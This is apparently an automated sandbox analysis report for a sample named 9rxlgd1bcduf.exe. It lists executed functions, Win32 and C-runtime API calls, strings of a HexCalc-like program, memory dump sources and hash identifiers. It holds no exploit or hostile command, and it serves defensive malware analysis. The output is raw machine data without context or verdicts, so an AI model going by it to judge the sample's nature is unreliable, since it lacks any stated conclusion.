Part of subcall function 00FB4B46: GetLastError.KERNEL32(00000000,?,00FB2461,00000000,?,?,00FB2478,?,00FB1787,00FB9270,00000008), ref: 00FB4B6E

HeapReAlloc.KERNEL32(00000000,00000000,00FB62CA,00000000,00000000,?,00FB4C25,?,00FB62CA,00000000,00000000,?,00FB3F54,00000000,00000010), ref: 00FB5D98
GetLastError.KERNEL32(?,00FB4C25,?,00FB62CA,00000000,00000000,?,00FB3F54,00000000,00000010,?,?,?,00FB3FDE,?,00FB93D0), ref: 00FB5DF3

Part of subcall function 00FB228D: DecodePointer.KERNEL32(?,00FB5D33,00000008,00000000,?,00FB4BDB,00FB10B4,00000008,00000000,00000000,00000000,?,00FB2422,00000001,00000214), ref: 00FB2298

GetLastError.KERNEL32(?,00FB4C25,?,00FB62CA,00000000,00000000,?,00FB3F54,00000000,00000010,?,?,?,00FB3FDE,?,00FB93D0), ref: 00FB5DDB

Part of subcall function 00FB226B: __getptd_noexit.LIBCMT ref: 00FB226B

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: ErrorHeapLast$AllocAllocateDecodeFreePointer__getptd_noexit_free_malloc
String ID:
API String ID: 3288285875-0
Opcode ID: dd2c685e4106d0b7bdd0edffadb885d66f19c1755f2c5bb4febc00efdfb32ebe
Instruction ID: 531e100b5a4c6729a5cd1624df8315e784613a9d85c4e86f4dea8d668d49160b
Opcode Fuzzy Hash: dd2c685e4106d0b7bdd0edffadb885d66f19c1755f2c5bb4febc00efdfb32ebe
Instruction Fuzzy Hash: 9511C833908E156BDB223B76AC097D93795AF487B0F240615F845DA191DB3CC8407F90

Uniqueness

Uniqueness Score: 0.51%

Function 00FB3305, Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00FB3311

Part of subcall function 00FB2470: __getptd_noexit.LIBCMT ref: 00FB2473
Part of subcall function 00FB2470: __amsg_exit.LIBCMT ref: 00FB2480

__getptd.LIBCMT ref: 00FB3328
__amsg_exit.LIBCMT ref: 00FB3336

Part of subcall function 00FB1FDF: __FF_MSGBANNER.LIBCMT ref: 00FB1FE4
Part of subcall function 00FB1FDF: __NMSG_WRITE.LIBCMT ref: 00FB1FEC

__lock.LIBCMT ref: 00FB3346

Part of subcall function 00FB41E2: __mtinitlocknum.LIBCMT ref: 00FB41F8
Part of subcall function 00FB41E2: __amsg_exit.LIBCMT ref: 00FB4204
Part of subcall function 00FB41E2: EnterCriticalSection.KERNEL32(MZER,MZER,?,00FB238D,0000000D), ref: 00FB420C

__updatetlocinfoEx_nolock.LIBCMT ref: 00FB335A

Part of subcall function 00FB32B8: ___addlocaleref.LIBCMT ref: 00FB32D6
Part of subcall function 00FB32B8: ___removelocaleref.LIBCMT ref: 00FB32E1
Part of subcall function 00FB32B8: ___freetlocinfo.LIBCMT ref: 00FB32F5

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: __amsg_exit$__getptd$CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__getptd_noexit__lock__mtinitlocknum__updatetlocinfo
String ID:
API String ID: 2777350688-0
Opcode ID: 8ed90993f2fff84dd8758fd22263d10e52c2468b4d3ac5e84a8ffa8b80f88eb1
Instruction ID: 301324dce655db77632a30472050011bd709548c61c6d3319d54f0aa52be9abe
Opcode Fuzzy Hash: 8ed90993f2fff84dd8758fd22263d10e52c2468b4d3ac5e84a8ffa8b80f88eb1
Instruction Fuzzy Hash: 31F09632D85614DAD751BB6A5C037DE76D06F00720F194209F554961D3CF785A40BE96

Uniqueness

Uniqueness Score: 0.57%

Function 025E9511, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150UNIQUE

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026420EF

Strings

RTL: Re-Waiting, xrefs: 02642123
RTL: Resource at %p, xrefs: 02642106
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 026420F7

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 68054a8c175478af9e0e649f1b7fabcdc1a03bc4b2d836b8f48fd807e3f9a8f6
Instruction ID: 79b2fc8c12d551503d4acc2504174bbfc8bf0ff4129501df5c6195c69ec9bd7d
Opcode Fuzzy Hash: 68054a8c175478af9e0e649f1b7fabcdc1a03bc4b2d836b8f48fd807e3f9a8f6
Instruction Fuzzy Hash: D8414D717002055BDF159B68CCD0FA67799BF85724F204119FD19DB2C1EB21E841CBA8

Uniqueness

Uniqueness Score: 100.00%

Function 025F22CB, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145UNIQUE

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02642251

Strings

RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 02642288
RTL: Re-Waiting, xrefs: 026422C5
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 02642258

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 885266447-3177188983
Opcode ID: 8209e93e64dd47b61ed7061e3186faa3358474e918fe468a7d9815352592c844
Instruction ID: 69b1233a235e7851f897348525f6faa895027f0dd8e20662358972785011b57f
Opcode Fuzzy Hash: 8209e93e64dd47b61ed7061e3186faa3358474e918fe468a7d9815352592c844
Instruction Fuzzy Hash: 7D41A470600204ABDB24DF65C8C5F6B77AAAF44724F208649FE559B3D0DB30E951CBA9

Uniqueness

Uniqueness Score: 100.00%

Function 025C60AE, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 025C6151

Strings

$, xrefs: 025C60DE
0, xrefs: 026529F3

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: __aulldvrm
String ID: $$0
API String ID: 1302938615-389342756
Opcode ID: 7d2689072b97782d93655b445d7771e2a14695cacbb4c833b0ac87ac06a39ac1
Instruction ID: 5df9eaed8587df9544a1dd6770a9dfff3709322796a0665f44d76e148e07ff4b
Opcode Fuzzy Hash: 7d2689072b97782d93655b445d7771e2a14695cacbb4c833b0ac87ac06a39ac1
Instruction Fuzzy Hash: C591BE70D082AA9EDF248FD9C8503FDBBB5BF85314F24469EDCA166391D3708641CB58

Uniqueness

Uniqueness Score: 0.03%

Analysis Process: 9rxlgd1bcduf.exe PID: 424 Parent PID: 1880 9rxlgd1bcduf.exeUNIQUE

Executed Functions

Function 010610C0, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 89windowregistryUNIQUE

Download Yara Rule

APIs

__time64.LIBCMT ref: 010610CB

Part of subcall function 0106194C: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,010610D0,00000000), ref: 01061957
Part of subcall function 0106194C: __aulldiv.LIBCMT ref: 01061977

Part of subcall function 01061764: __getptd.LIBCMT ref: 01061769

LoadIconW.USER32(?,HexCalc), ref: 010610FD
LoadCursorW.USER32(00000000,00007F00), ref: 0106110C
RegisterClassW.USER32(00000003), ref: 0106112A
MessageBoxW.USER32(00000000,Program requires Windows NT!,HexCalc,00000010), ref: 01061142
CreateDialogParamW.USER32(?,HexCalc,00000000,00000000,00000000), ref: 01061161
ShowWindow.USER32(00000000,?), ref: 01061171
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 01061184
TranslateMessage.USER32(?), ref: 0106119B
DispatchMessageW.USER32(?), ref: 010611A1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010611AD

Strings

HexCalc, xrefs: 010610DC, 01061123, 01061137, 01061155
Program requires Windows NT!, xrefs: 0106113C

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: Message$LoadTime$ClassCreateCursorDialogDispatchFileIconParamRegisterShowSystemTranslateWindow__aulldiv__getptd__time64
String ID: HexCalc$Program requires Windows NT!
API String ID: 1340511868-3919904463
Opcode ID: 121128008c66d13e79ad9f4ae2bf49182c9ada9505ed6b5fde11e4db07064668
Instruction ID: e42d6e7591fea1b76caa57b852b6dd6653bcd0152a29bf819b87fac0b83990ce
Opcode Fuzzy Hash: 121128008c66d13e79ad9f4ae2bf49182c9ada9505ed6b5fde11e4db07064668
Instruction Fuzzy Hash: A8214A71900219EBDB20DFA9EC49EDFBBBCEB89B14F00411AF941EB244D7B95501CBA0

Uniqueness

Uniqueness Score: 100.00%

Function 010616AB, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100UNIQUE

Download Yara Rule

APIs

Part of subcall function 0106228D: DecodePointer.KERNEL32(?,01065D33,00000008,00000000,?,01064BDB,010610B4,00000008,00000000,00000000,00000000,?,01062422,00000001,00000214), ref: 01062298

_malloc.LIBCMT ref: 01061BA6

Part of subcall function 010616C5: __FF_MSGBANNER.LIBCMT ref: 010616DE
Part of subcall function 010616C5: __NMSG_WRITE.LIBCMT ref: 010616E5
Part of subcall function 010616C5: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,01064B91,010610B4,00000001,010610B4,?,0106416D,00000018,010693F0,0000000C,010641FD), ref: 0106170A

std::exception::exception.LIBCMT ref: 01061BDB
std::exception::exception.LIBCMT ref: 01061BF5

Part of subcall function 01063E84: std::exception::operator=.LIBCMT ref: 01063E9D

__CxxThrowException@8.LIBCMT ref: 01061C06

Part of subcall function 01064014: RaiseException.KERNEL32(?,?,01061C0B,01061580,?,?,?,?,01061C0B,01061580,010692AC,0112F7B0,01061580), ref: 01064056

IsDebuggerPresent.KERNEL32 ref: 01061CC7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01061CDC
UnhandledExceptionFilter.KERNEL32(010671B8), ref: 01061CE7
GetCurrentProcess.KERNEL32(C0000409), ref: 01061D03
TerminateProcess.KERNEL32(00000000), ref: 01061D0A

Strings

bad allocation, xrefs: 01061BD4

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: Exception$FilterProcessUnhandledstd::exception::exception$AllocateCurrentDebuggerDecodeException@8HeapPointerPresentRaiseTerminateThrow_mallocstd::exception::operator=
String ID: bad allocation
API String ID: 1593154362-2104205924
Opcode ID: bfbc7b3c20416b814c1f5cc07f19d5eab2e9ca8f876e6f4de416c14083929568
Instruction ID: 1e69728ebc03bc447f35ef09fba374e5b45dbd638d9febbad66b937c14f6d455
Opcode Fuzzy Hash: bfbc7b3c20416b814c1f5cc07f19d5eab2e9ca8f876e6f4de416c14083929568
Instruction Fuzzy Hash: F7416E7550021AEFE738EF69F404A99BBF8FB44704F00416AF5A4D7298E7B155A28F90

Uniqueness

Uniqueness Score: 100.00%

Function 010634EA, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000034A8), ref: 010634EF

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 00ee57c65dbc942128433c5245a783608714185783d4c492e52a0127a8f0bb9c
Instruction ID: 384103a4731b55e3e4dbaadf47e53ae148ed2b64a196678939e38e29825d2b6d
Opcode Fuzzy Hash: 00ee57c65dbc942128433c5245a783608714185783d4c492e52a0127a8f0bb9c
Instruction Fuzzy Hash: FE9002BC2911409666191B7578094057994AA885267510454B089CC05CDE5560445671

Uniqueness

Uniqueness Score: 0.01%

Function 010625B9, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,01061A50), ref: 010625C1
__mtterm.LIBCMT ref: 010625CD
GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,01061A50), ref: 010625E3
GetProcAddress.KERNEL32(00000000,FlsGetValue,?,01061A50), ref: 010625F0
GetProcAddress.KERNEL32(00000000,FlsSetValue,?,01061A50), ref: 010625FD
GetProcAddress.KERNEL32(00000000,FlsFree,?,01061A50), ref: 0106260A
TlsAlloc.KERNEL32(?,01061A50), ref: 0106265A
TlsSetValue.KERNEL32(00000000,?,01061A50), ref: 01062675
__init_pointers.LIBCMT ref: 0106267F

Part of subcall function 01061D67: __initp_misc_winsig.LIBCMT ref: 01061D8A

RtlEncodePointer.NTDLL(?,01061A50), ref: 01062690
RtlEncodePointer.NTDLL(?,01061A50), ref: 0106269D
RtlEncodePointer.NTDLL(?,01061A50), ref: 010626AA
RtlEncodePointer.NTDLL(?,01061A50), ref: 010626B7

Part of subcall function 01064068: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 01064090

RtlDecodePointer.NTDLL(0106248A,?,01061A50), ref: 010626D8
__calloc_crt.LIBCMT ref: 010626ED

Part of subcall function 01064BC5: Sleep.KERNEL32(00000000,00000008,010610B4), ref: 01064BED

RtlDecodePointer.NTDLL(00000000,?,01061A50), ref: 01062707

Part of subcall function 01062343: GetModuleHandleW.KERNEL32(KERNEL32.DLL,01069320,00000008,0106244B,00000000,00000000,?,?,01062478,?,01061787,01069270,00000008,010610B4), ref: 01062354
Part of subcall function 01062343: __lock.LIBCMT ref: 01062388
Part of subcall function 01062343: InterlockedIncrement.KERNEL32(837CBB20), ref: 01062395
Part of subcall function 01062343: __lock.LIBCMT ref: 010623A9
Part of subcall function 01062343: ___addlocaleref.LIBCMT ref: 010623C7

GetCurrentThreadId.KERNEL32(?,01061A50), ref: 01062719
__mtterm.LIBCMT ref: 0106272A

Part of subcall function 01062306: DecodePointer.KERNEL32(00000003,0106272F,?,01061A50), ref: 01062317
Part of subcall function 01062306: TlsFree.KERNEL32(00000005,0106272F,?,01061A50), ref: 01062331
Part of subcall function 01062306: DeleteCriticalSection.KERNEL32(00000000,00000000,7764A585,?,0106272F,?,01061A50), ref: 010640CF
Part of subcall function 01062306: _free.LIBCMT ref: 010640D2
Part of subcall function 01062306: DeleteCriticalSection.KERNEL32(00000005,7764A585,?,0106272F,?,01061A50), ref: 010640F9

Strings

FlsAlloc, xrefs: 010625DD
KERNEL32.DLL, xrefs: 010625BC
FlsFree, xrefs: 010625FF
FlsSetValue, xrefs: 010625F2
FlsGetValue, xrefs: 010625E5

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$CriticalDecodeSection$DeleteHandleModule__lock__mtterm$AllocCountCurrentFreeIncrementInitializeInterlockedSleepSpinThreadValue___addlocaleref__calloc_crt__init_pointers__initp_misc_winsig_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 1149409264-3819984048
Opcode ID: e46e59ad4e75f63d4c2ff2e4d60b718a2fc36a8307f25b799255589ed238bc59
Instruction ID: 62aa3d800ac47c16ed0da97632c548d75316f5cdb56b6330510814f63bffb626
Opcode Fuzzy Hash: e46e59ad4e75f63d4c2ff2e4d60b718a2fc36a8307f25b799255589ed238bc59
Instruction Fuzzy Hash: E5318F31900255DBE775AF79AC0CA153FE8FB48664B14057AF5A4EB2ACDB7AC080CF61

Uniqueness

Uniqueness Score: 1.51%

Function 01061360, Relevance: 27.2, APIs: 18, Instructions: 239windowsleepUNIQUE

Download Yara Rule

APIs

PostQuitMessage.USER32(00000000), ref: 010613AC
LoadIconW.USER32(?,0000006B), ref: 010613BD
GetSystemMetrics.USER32(0000000B), ref: 010613D0
GetSystemMetrics.USER32(0000000C), ref: 010613D9
CharUpperW.USER32(?), ref: 010613F4
GetDlgItem.USER32(?,00000000), ref: 01061406
SendMessageW.USER32(00000000,000000F3,00000001,00000000), ref: 01061426
Sleep.KERNEL32(00000064), ref: 0106142A
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0106143A
BeginPaint.USER32(?,?), ref: 01061442
CreateSolidBrush.GDI32(?), ref: 010614D9
FillRect.USER32(?,00000000,00000000), ref: 010614EC
DeleteObject.GDI32(00000000), ref: 010614F3
EndPaint.USER32(?,?), ref: 01061514
DefWindowProcW.USER32(?,?,?,?), ref: 01061555
DestroyWindow.USER32(00100106), ref: 01061575

Part of subcall function 01061000: _memset.LIBCMT ref: 0106101F
Part of subcall function 01061000: _memset.LIBCMT ref: 01061038

SetFocus.USER32(?), ref: 010615D0

Part of subcall function 0106191C: __isxdigit_l.LIBCMT ref: 01061943

Part of subcall function 01061898: __isdigit_l.LIBCMT ref: 010618BD

Part of subcall function 010611C0: wsprintfW.USER32 ref: 010611DF
Part of subcall function 010611C0: SetDlgItemTextW.USER32(?,0000001B,?), ref: 010611EF

MessageBeep.USER32(00000000), ref: 0106168F

Part of subcall function 010616B6: IsDebuggerPresent.KERNEL32 ref: 01061CC7
Part of subcall function 010616B6: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01061CDC
Part of subcall function 010616B6: UnhandledExceptionFilter.KERNEL32(010671B8), ref: 01061CE7
Part of subcall function 010616B6: GetCurrentProcess.KERNEL32(C0000409), ref: 01061D03
Part of subcall function 010616B6: TerminateProcess.KERNEL32(00000000), ref: 01061D0A

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: Message$ExceptionFilterItemMetricsPaintProcessSendSystemUnhandledWindow_memset$BeepBeginBrushCharCreateCurrentDebuggerDeleteDestroyFillFocusIconLoadObjectPostPresentProcQuitRectSleepSolidTerminateTextUpper__isdigit_l__isxdigit_lwsprintf
String ID:
API String ID: 3436449669-0
Opcode ID: bcb58c70b7d7cbf14778e603f46bdf728e343e8b39be48bbc88b58c1e3237bc4
Instruction ID: 301466b8aed68f5ff8a2c1344b7bb0934ca16fc8584463588ecab02ee7b88e4b
Opcode Fuzzy Hash: bcb58c70b7d7cbf14778e603f46bdf728e343e8b39be48bbc88b58c1e3237bc4
Instruction Fuzzy Hash: 1481E575604201DBD738DF28E84467A7BEEEBCC305F04493AF592CB299DB399A41CB61

Uniqueness

Uniqueness Score: 100.00%

Function 01065CD7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52memoryUNIQUE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000008,00000000,?,01064BDB,010610B4,00000008,00000000,00000000,00000000,?,01062422,00000001,00000214), ref: 01065D1A

Part of subcall function 0106228D: DecodePointer.KERNEL32(?,01065D33,00000008,00000000,?,01064BDB,010610B4,00000008,00000000,00000000,00000000,?,01062422,00000001,00000214), ref: 01062298

Part of subcall function 0106226B: __getptd_noexit.LIBCMT ref: 0106226B

Strings

v.dw, xrefs: 01065D1A

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: AllocateDecodeHeapPointer__getptd_noexit
String ID: v.dw
API String ID: 2551771081-2452816266
Opcode ID: 6487d42d5e92b5722823571810a42ef62e41aae5999b6b7ebef4692f1abedf0e
Instruction ID: b6b4abb8382b38a5ae945766e3aa1c70d5f7e172fefccbe51d217e5acba6fc29
Opcode Fuzzy Hash: 6487d42d5e92b5722823571810a42ef62e41aae5999b6b7ebef4692f1abedf0e
Instruction Fuzzy Hash: 4801F7312012169BFBB9AF39DC08B6B37DCAF917A0F014669E899CB1E4DB30C441C750

Uniqueness

Uniqueness Score: 100.00%

Function 01061000, Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 010616AB: _malloc.LIBCMT ref: 01061BA6
Part of subcall function 010616AB: std::exception::exception.LIBCMT ref: 01061BDB
Part of subcall function 010616AB: std::exception::exception.LIBCMT ref: 01061BF5
Part of subcall function 010616AB: __CxxThrowException@8.LIBCMT ref: 01061C06
Part of subcall function 010616AB: IsDebuggerPresent.KERNEL32 ref: 01061CC7
Part of subcall function 010616AB: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01061CDC
Part of subcall function 010616AB: UnhandledExceptionFilter.KERNEL32(010671B8), ref: 01061CE7
Part of subcall function 010616AB: GetCurrentProcess.KERNEL32(C0000409), ref: 01061D03
Part of subcall function 010616AB: TerminateProcess.KERNEL32(00000000), ref: 01061D0A

_memset.LIBCMT ref: 0106101F
_memset.LIBCMT ref: 01061038

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled_memsetstd::exception::exception$CurrentDebuggerException@8PresentTerminateThrow_malloc
String ID:
API String ID: 671016078-0
Opcode ID: eed72977febd29057b24054a039ddfd1dfc0b1e08284e8dafdc78a8b6bcab041
Instruction ID: 3acf0797bd3e77d86f45b042f1cf93736806aea08b04788e8b0079ea45d6f654
Opcode Fuzzy Hash: eed72977febd29057b24054a039ddfd1dfc0b1e08284e8dafdc78a8b6bcab041
Instruction Fuzzy Hash: 43E0DFF2F4355132E662B1C02C42FCA210D8BE27E8F1C0230FAC9A9181F1A42A1481AB

Uniqueness

Uniqueness Score: 0.65%

Function 01063F90, Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 01063F97

Part of subcall function 01064BC5: Sleep.KERNEL32(00000000,00000008,010610B4), ref: 01064BED

RtlEncodePointer.NTDLL(00000000), ref: 01063FA1

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: EncodePointerSleep__calloc_crt
String ID:
API String ID: 2859887112-0
Opcode ID: a4f02f0de69538dc8419a315ddf99bdc9c0f38c878b6108f92a9d39d5a661d69
Instruction ID: cb0bd8c9a7fbce2afa5b26f993f9380461740c8f844d3b8a764c014ef0d4efef
Opcode Fuzzy Hash: a4f02f0de69538dc8419a315ddf99bdc9c0f38c878b6108f92a9d39d5a661d69
Instruction Fuzzy Hash: ABE0C2325493215BF7F59A24B405B922BD4E744730F110116F984CA1C8DA2048814B84

Uniqueness

Uniqueness Score: 0.51%

Function 010612FE, Relevance: 1.6, APIs: 1, Instructions: 99windowsleepUNIQUE

Download Yara Rule

APIs

Part of subcall function 0106191C: __isxdigit_l.LIBCMT ref: 01061943

Part of subcall function 01061898: __isdigit_l.LIBCMT ref: 010618BD

Part of subcall function 010611C0: wsprintfW.USER32 ref: 010611DF
Part of subcall function 010611C0: SetDlgItemTextW.USER32(?,0000001B,?), ref: 010611EF

PostQuitMessage.USER32(00000000), ref: 010613AC
LoadIconW.USER32(?,0000006B), ref: 010613BD
GetSystemMetrics.USER32(0000000B), ref: 010613D0
GetSystemMetrics.USER32(0000000C), ref: 010613D9
CharUpperW.USER32(?), ref: 010613F4
GetDlgItem.USER32(?,00000000), ref: 01061406
SendMessageW.USER32(00000000,000000F3,00000001,00000000), ref: 01061426
Sleep.KERNEL32(00000064), ref: 0106142A
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0106143A
BeginPaint.USER32(?,?), ref: 01061442
CreateSolidBrush.GDI32(?), ref: 010614D9
FillRect.USER32(?,00000000,00000000), ref: 010614EC
DeleteObject.GDI32(00000000), ref: 010614F3
EndPaint.USER32(?,?), ref: 01061514
DefWindowProcW.USER32(?,?,?,?), ref: 01061555
MessageBeep.USER32(00000000), ref: 0106168F

Part of subcall function 010616B6: IsDebuggerPresent.KERNEL32 ref: 01061CC7
Part of subcall function 010616B6: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01061CDC
Part of subcall function 010616B6: UnhandledExceptionFilter.KERNEL32(010671B8), ref: 01061CE7
Part of subcall function 010616B6: GetCurrentProcess.KERNEL32(C0000409), ref: 01061D03
Part of subcall function 010616B6: TerminateProcess.KERNEL32(00000000), ref: 01061D0A

DestroyWindow.USER32(00100106), ref: 01061575

Part of subcall function 01061000: _memset.LIBCMT ref: 0106101F
Part of subcall function 01061000: _memset.LIBCMT ref: 01061038

SetFocus.USER32(?), ref: 010615D0

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

